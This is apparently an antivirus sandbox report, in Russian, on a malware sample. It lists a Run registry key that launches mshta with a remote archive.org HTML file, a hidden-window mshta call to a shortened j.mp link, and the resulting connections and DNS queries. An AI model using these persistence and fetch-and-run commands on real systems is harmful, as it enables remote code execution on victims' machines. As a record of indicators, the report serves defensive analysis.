Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'LifeScience' = 'mshta https://ia601500.us.archive.org/11/items/10_20210628_202106/4.html'
- '<SYSTEM32>\mshta.exe' http://%2##20@j.mp/guhrvp0aj81pp9z049qf
- 'j.#p':80
- 'ia#####9.us.archive.org':443
- 'cr#.#odaddy.com':80
- http://cr#.#odaddy.com/gdroot-g2.crl
- 'ia#####9.us.archive.org':443
- DNS ASK j.#p
- DNS ASK ia#####9.us.archive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK st####.rapidssl.com
- '<SYSTEM32>\mshta.exe' http://%2##20@j.mp/guhrvp0aj81pp9z049qf' (со скрытым окном)